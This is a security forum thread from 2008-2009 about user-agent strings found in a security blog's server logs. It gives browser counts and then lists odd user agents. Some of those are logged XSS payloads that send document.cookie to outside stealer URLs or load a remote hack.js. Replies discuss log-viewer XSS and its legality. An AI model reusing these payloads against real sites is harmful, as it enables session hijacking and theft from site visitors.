Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
User agents (Long probably pointless)
Posted by: id
Date: February 16, 2008 02:57PM

I was looking at the logs on ha.ckers for the first time in months, and over the past couple of months there were a total of 4773 unique User Agents.

These are the totals for User Agents with "Microsoft" or "IE" in the UA name.

1 <!--[if gte IE 4]><SCRIPT>alert
1 IE50
1 IEAutoDiscovery
1 MaxIE
1 Microsoft Data Access Internet Publishing Provider DAV 1.1; afcid=W68da1e0be0f6543da3f70fdfc00fb277
1 Microsoft Data Access Internet Publishing Provider DAV 1.2
1 Microsoft URL Control - 5.01.4319
1 MyIE
2 Microsoft Windows XP NT 5.0
3 MSIE 5.0
3 Mozilla/5.0 compatible; MSIE5.5; Windows 98;
4 MSIE 7.0
4 Microsoft Data Access Internet Publishing Provider Cache Manager
5 Microsoft Office Existence Discovery
7 Microsoft Office Protocol Discovery
8 AOL 7.0/MSIE 5.5
8 MSIE7.01 UNIX
8 SAMSUNG-SGH-i710/MSIE4.01/WAP2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
9 MSIE 7.0; Windows NT 6.0;
10 MSIE 7.0/Nutch-1.0-dev
10 Microsoft-WebDAV-MiniRedir/6.0.6000
11 IE
11 Microsoft Visio MSIE
13 IE/4.0
13 MSIE5.5
13 Windoof NT3.51;IE4
16 Microsoft
21 IE 7.0
26 MSIE
30 Internet Explorer 7.0, Microsoft Co.
44 Microsoft Data Access Internet Publishing Provider DAV 1.1
70 Microsoft Data Access Internet Publishing Provider Protocol Discovery
153 Microsoft URL Control - 6.01.9782
171 Microsoft-WebDAV-MiniRedir/5.1.2600
329 Microsoft URL Control - 6.00.8862
412 Microsoft Internet Explorer/4.0b1
574 Microsoft Pocket Internet Explorer/0.6
1406 Microsoft URL Control - 6.00.8169
1809 Microsoft Internet Explorer
2130 IE/6.0

Not very many for almost 3 months, wget has almost as many entries...

4458 Wget/1.10.2

By and Opera:
1 Opera 7.0 SonyEricssonP990i/R100 Mozilla/4.0
1 Opera/7.01
1 Opera/7.22
1 Opera/7.54u1
1 Opera/8.02
1 Opera/99.01
2 Opera 9.7.2.0
2 Opera/9.1
2 Opera/9.24
3 Opera/7.23
3 Opera/7.26
3 Opera/9
3 Opera/9.2
4 Opera/8.10
5 Opera/7.51
7 Mozilla/5.0 Opera/9.01
7 Opera/<marquee><nobr><b>\xd1\xea\xf0\xe8\xef\xf2-\xed\xe0\xf1\xf2\xee\xeb\xfc\xea\xee_\xf1\xf3\xf0\xee\xe2\xfb\xe9_\xf7\xf2\xee_\xef\xee\xeb\xe7\xe0\xe5\xf2_\xef\xee_\xf1\xe0\xe9\xf2\xe0\xec_\xf1_\xef\xee\xec\xee\xf9\xfc\xfe_\xea\xee\xec\xe0\xed\xe4\xed\xee\xe9_\xf1\xf2\xf0\xee\xea\xe8=)<title>
8 Opera/6.05
8 Opera/6.09
8 Opera/9.0
10 Opera/8.52
12 Opera/8.53
18 Opera 8.54
27 Opera/6.03
28 Opera/7.02 Bork-edition
28 Opera/9.26
39 Opera/6.02
44 Opera/8.54
49 Opera/5.02
54 Opera/7.50
61 Opera/9.12
63 Opera/6.01
70 Opera/7.0
77 Opera/8.51
99 Opera/6.04
115 Opera/8.0
126 Opera/8.50
129 Opera/7.60
136 Opera/7.54
143 Opera/7.11
156 Opera/9.30
172 Opera/8.00
263 Opera/8.5
1354 Opera/9.01
1387 Opera/9.02
2042 Opera/9.00
3339 Opera/9.10
3708 Opera/4.0
4687 Opera/8.01
5429 Opera/9.20
5832 Opera/9.22
6524 Opera/9.21
21065 Opera/9.50
25328 Opera/9.23
35050 Opera/9.24
39649 Opera/9.25
52247 Opera/9.0

Mozilla:
1 =Mozilla/5.0
1 Build identifier: Mozilla/5.0
1 MoGET /favicon.ico HTTP/1.1, Mozilla/5.0
1 Mozilla 4.0
1 Mozilla 5.0
1 Mozilla 5.0 Firefox
1 Mozilla/0.97 no dos :)
1 Mozilla/2.0
1 Mozilla/4.0
1 Mozilla/4.7 [en]C-NSCPCD
1 Mozilla/4.72
1 Mozilla/4.72 [en]
1 Mozilla/4.78 [ja]
1 Mozilla/5.0 Galeon/1.2.6
1 Mozilla/5.0 Gecko/20020823 MultiZilla?/v1.1.22
1 Mozilla/5.0 Opera/12.01
1 Mozilla/5.0 UP.Link/6.3.1.17.06.3.1.17.06.3.1.17.0
1 Mozilla/5.0 libwww-perl/5.805
1 Mozilla/5.01
1 Mozilla/9.2
1 Opera 7.0 SonyEricssonP990i/R100 Mozilla/4.0
1 T-Mobile Dash Mozilla/4.0
1 User-Agent: Mozilla/5.0 Gecko/20080108 Firefox/2.0.0.11
1 \xe2\x80\x9cMozilla/4.0
2 MOT-A1200/R532H2_G_11.20.08P Mozilla/4.0
2 MOT-Q9/01.07.05R Mozilla/4.0
2 Mozilla /4.0
2 Mozilla/2.02E
2 Mozilla/3.01Gold
2 Mozilla/4.0/Nutch-1.0-dev
2 Mozilla/4.0\\r\\n
2 Mozilla/4.21
2 Mozilla/4.61 [ja]
2 Mozilla/4.78 [en]
2 Mozilla/4.78 [sv]
2 Mozilla/4.78iC-CCK-MCD [en_US]
2 Mozilla/4.79 [en]C-CCK-MCD Alehop
2 Mozilla/4.79 [en]C-CCK-MCD DOJ3jx7bf
2 Mozilla/4.79 [en]C-gatewaynet
2 Mozilla/5.0 Gecko/20070713 Firefox/2.0.0.0
2 Mozilla/5.0 NewsFox/0.8.4b1
2 Mozilla/5.0 Safari
2 Mozilla/5.0 UP.Link/6.3.1.20.06.3.1.20.06.3.1.20.0
2 mozilla 4.0
3 GRD-267DTU Mozilla/4.0
3 HTC_P4350 Mozilla/4.0
3 Mozilla/4.
3 Mozilla/4.00
3 Mozilla/5.0 NewsFox/0.8.1
3 Mozilla/5.0 compatible; MSIE5.5; Windows 98;
3 \"Mozilla/4.0
3 del.icio.us-thumbnails/1.0 Mozilla/5.0
4 HTC-3100/1.2 Mozilla/4.0
4 MOT-RAZRV3xx/96.B0.0AR BER2.2 Mozilla/4.0
4 Mozilla/4.0 www.USALocalSearch.us Robot
4 Mozilla/4.08
4 Mozilla/4.7 [de]
4 Mozilla/5.0 UP.Link/6.3.1.17.06.3.1.17.0
5 'Mozilla/4.0
5 Mozilla/5.0 someone@somewhere.any
5 Mozilla/Firefox
5 Palm680/RC1 Mozilla/4.0
5 Python-urllib/1.17, Mozilla/5.0
5 SonyEricssonP1i/R100 Mozilla/4.0
6 HTCS621-Mozilla/4.0+
6 Mozilla/3.0 WebTV/1.2
6 Mozilla/4.5
6 Mozilla/4.5 [en]C-CCK-MCD {TLC;RETAIL}
6 Mozilla/5.0 Galeon/1.2.5
6 Mozilla/5.0 UP.Link/6.3.1.17.0
6 \"Mozilla/5.0
6 \"Mozilla\"
7 Mozilla 4.3
7 Mozilla 5.0
7 Mozilla Firefox 2.0.0.4
7 Mozilla/4.22
7 Mozilla/5.0 Gecko/20079999 Firefox/2.x.x.x
7 Mozilla/5.0 Opera/9.01
7 Mozilla/5.0+
7 Mozilla/5.001
7 Mozilla/6.0
7 PPC; 240x320; HTC_TyTN/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Mozilla/4.0
7 SonyEricssonW950i/R100 Mozilla/4.0
8 HTC-8900/1.2 Mozilla/4.0
8 Mozilla/4.51 [tr]C-CCK-MCD SOL_NS451tr - F&C
8 Mozilla/4.77 [en]
8 Mozilla/4.O
8 Mozilla/5.0 Firefox
8 Mozilla/5.0 NewsFox/0.8.4b2
8 Mozilla/5.0 UP.Link/6.3.1.20.0
8 Mozilla/7.0
8 SAMSUNG-SGH-I617/1.0 Mozilla/4.0
8 Windows Vista: Mozilla/4.0
9 HTC-8100/1.2 Mozilla/4.0
9 HTC_TouchDual Mozilla/4.0
9 Mozilla Firefox
9 Mozilla/4.79C-CCK-MCD [en]
9 publicMozilla/FrontUSB/9.0
10 Mozilla/5.0 NewsFox/0.8.3.1
11 Mozilla Firefox
12 Mozilla/4.0 WebTV/2.6
12 Mozilla/4.06 [en]
12 Mozilla/4.1
12 PANTECH-C810/R01 Mozilla/4.0
12 illuz1oN's -> Mozilla/5.0
14 MOT-ROKR E2/R564_G_12.00.43P Mozilla/4.0
14 Mozilla/4.8
14 Mozilla/5.0 Gecko/20021029 Phoenix/0.4
14 Mozilla/5.0 NewsFox/0.8.4rc1
16 1.0.6 on Debian Linux - Mozilla/5.0
16 MOT-MOTOROKRE6/R533_G_11.12.08P Mozilla/4.0
16 Mozilla/5.0 Gecko/20050511 Firefox/1.0.4
17 Googlebot googlebot bot spider Mozilla/4.8 [en]
17 PPC; 240x320; HTC_P3450/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Mozilla/4.0
18 Mozilla/4.79
19 Mozilla/4.05 [en]
20 HPiPAQhw6900/1.0/Mozilla/4.0
20 Mozilla/5.0 Galeon/1.2.0
22 Mozilla/2.02 [fr]
23 Mozilla/3.01-C-SYMPA
24 Mozilla/4.0 WebTV/2.8
27 Mozilla/1.10 [en]
27 Mozilla/4.7C-SGI [en]
27 User-Agent=Mozilla/5.0
28 Mozilla/4.2
28 Mozilla/5.0 NewsFox/0.8.4
28 Y!OASIS/TEST no-ad Mozilla/4.08 [en]
29 Mozilla/4.5 RPT-HTTPClient/0.3-2
30 Mozilla/4.06 [es]
37 Mozilla/4.5 [en]C-CCK-MCD {TLC;RETAIL}
37 User-Agent: Mozilla/5.0
40 Mozilla/6.0;
41 Mozilla/4.0 Sprint:MotoQ
44 Mozilla/5.0 UP.Link/6.3.0.0.0
46 HTC-8500/1.2 Mozilla/4.0
49 Mozilla/8.0
50 Mozilla
54 Mozilla/4.75 [en]
58 Mozilla/4.0 compatible FurlBot/Furl Search 2.0
58 Mozilla/4.01
58 Mozilla/6.66 [en]
61 Mozilla/4.0+
65 Mozilla/4.7 [en]
75 Mozilla/4.0 compatible ZyBorg/1.0
77 Mozilla/4.08 [en]
82 MOT-Q9/01.04.35R Mozilla/4.0
82 Mozilla/5.0 Gecko/20070713 Firefox/2.0.0.0
84 Mozilla/7.0
85 Mozilla/4.5 [en]
86 SAMSUNG-SGH-I607/I607FG1 Mozilla/4.0
86 SonyEricssonP990i/R100 Mozilla/4.0
95 Mozilla
97 MSNBOT_Mobile MSMOBOT Mozilla/2.0
139 Mozilla/0.6 Beta
143 Mozilla/0.91 Beta
144 Mozilla/4.78
156 Mozilla/4.79 [en]
166 Mozilla/4.7
184 Mozilla/2.0 compatible; Check&amp;Get 1.14
192 Mozilla/4.76 [en]
245 MaSagool/Mozilla/5.0
313 \"Mozilla/5.0
330 mozilla/5.0
369 Mozilla/6.0
370 Mozilla/4.61
419 Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
466 MOT-MPx220/1.400 Mozilla/4.0
603 Mozilla/4.61 [en]
603 Mozilla/5.0 NewsFox/0.8.2
675 Mozilla/4.8 [en]
874 Mozilla/5.0 NewsFox/0.8.3
1065 Mozilla/3.01
1296 Mozilla/1.22
3068 Mozilla/4.0
3297 Mozilla/5.0
3779 Mozilla/2.0
3818 Mozilla/3.0
3889 Mozilla/4.5
5809 Mozilla/3.0
13748 User-Agent: Mozilla/4.0
1483529 Mozilla/4.0
2498049 Mozilla/5.0

Here are the complete top ten UA:

40716 libwww-perl/5.805
43629 Liferea/1.4.4
46785 Apple-PubSub/59
52247 Opera/9.0
56183 libwww-perl/5.808
69908 Akregator/1.2.7; librss/remnants
104208 Windows-RSS-Platform/1.0
121315 -
1483529 Mozilla/4.0
2498049 Mozilla/5.0

So, even if we give all the "-" entry ones to IE, it still seems like a very very small percentage of our traffic. Do that few people really use IE?

-id



Edited 1 time(s). Last edit at 02/16/2008 02:59PM by id.

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: Malkav
Date: February 18, 2008 02:48AM

i'd rather say that either the average IE user doesn't come here, or more plausible, anyone sufficiently security aware has thrown away IE to the bin. i'd say the IE traffic here is pretty much an artefact.

but what ? no dillo ? no lynx/links/elinks ? no netcat ? no faked user agents ? (i tend to love inserting bash quotes as a user agent in www logs. i don't think being the only one doing whacky stuff around here)

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: id
Date: February 18, 2008 04:00PM

Like I said, there were 4773 unique User Agents, a few quotes:

"my System is like a wigwam, no gates and no windows inside."

176 Lynx/2.8.3rel.1 libwww-FM/2.14FM
1 lynx fuckyou linuz

Some odd ones, lots of XSS, etc attempts.
iTunes/4.7.1
mice
1984
<blink>?</blink>
<script>document.location=\"http://sitea.com/log.php?c=\"+document.cookie+\"&redirect=http://siteb.com\";</script>
<script>while
Keep Out
<script>window.open
SET USER AGENT
fuck you
none
Mr. Big Liar
Particls
<b>'Treated As: \"Top Secret\"!'
<script src=http://usethebackdoor.free.fr/hack.js></script>
God
xx<script>alert
h4x0r
Hacked
ILOVEBFS
UberHax0r.9000
<!--<b>vvv//-->cccc
<b><h2>31337 Antichat Member.Fuck u, Spielberg</h2></b>
<html><body><script>alert
<script type=\"javascript\">window.location=\"http://s3klyma.110mb.com/stealer.php?cookie=\" + document.cookie</script>
Behold the Ueberbrowser!
Dont Know Limited Browser
ha.ckers.org
something
Fuck you doch. Meinen Browser erf\xc3\xa4hrst du nicht!
I'm not telling =P
all email  for alaska
BatMobile
Defaced
What the F*** Do You Care?  It is My business!
Find another way
why do you care you freek? ;)

I'm sure there are more, but not going to look through that many!

-id

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: Malkav
Date: February 18, 2008 04:49PM

"my System is like a wigwam, no gates and no windows inside."

excellent :)

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: Matt Presson
Date: February 20, 2008 08:37AM

Very classy, and funny to boot!

Options: ReplyQuote
Re: User agents (Long probably pointless)
Date: February 26, 2008 11:08AM

Who else here surfs with an empty user-agent string?

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: Syme
Date: January 18, 2009 02:37PM

I wonder what the chance of people's user agents being viewed in a manner that's vulnerable to XSS is. If the chance is decent then I just had an interesting (and probably legal to implement!) idea.

Also, please don't strangle me for posting on an old thread.



Edited 1 time(s). Last edit at 01/18/2009 02:38PM by Syme.

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: id
Date: January 19, 2009 12:01PM

webalizer and others have been exploited via XSS in the logs, and I guess any web based analytics page has a chance of being exploitable.

-id

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: rsnake
Date: January 19, 2009 03:24PM

Yup, log files are often posted in random ways. That's why user agent and referrer spam is so frequent. Often enough those logs get posted and they end up helping out the attackers. It's not a new attack by _any_ means.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: Syme
Date: January 19, 2009 07:08PM

I gather that it's not a new attack (although I still quite like the idea). I wouldn't want to use the classic cookie stealing xss, because as I have little direct control of who views your user agent, it would probably get me into more trouble than it's worth, and out of my depth. I've just written a variant on it which simply reciprocates what they tried to do to you by logging their referrer, user id and ip. Useful because it's completely legal (I think) and (hopefully sometimes) warns you when people view info on you.

Options: ReplyQuote
Re: User agents (Long probably pointless)
Posted by: wireghoul
Date: January 19, 2009 10:45PM

The legality is subject to any number of things, if you are in the US then apparently breach of ToS might be a hack these days. And if you're in a different country the wording of your local computer crimes act is likely to be somewhat vaguely defined as to allow for oddball cases to be tried without having to invent new laws.
And even if it is legal to submit XSS in user agents, the actions recorded could be conceived as illegal surveillance or heavens forbid it breaks something you might still be the subject of a civil lawsuit which can be very costly even if you win it just based on court/lawyer costs alone. That's how a certain religious group took down the cult awareness network, frivolous civil lawsuits leading to bankruptcy.

The likely hood of you getting sued/arrested for such an attack I'd say is very low, but it's still possible. It really depends on what your attack does and who the recipients are.

[www.justanotherhacker.com]

Options: ReplyQuote


Sorry, only registered users may post in this forum.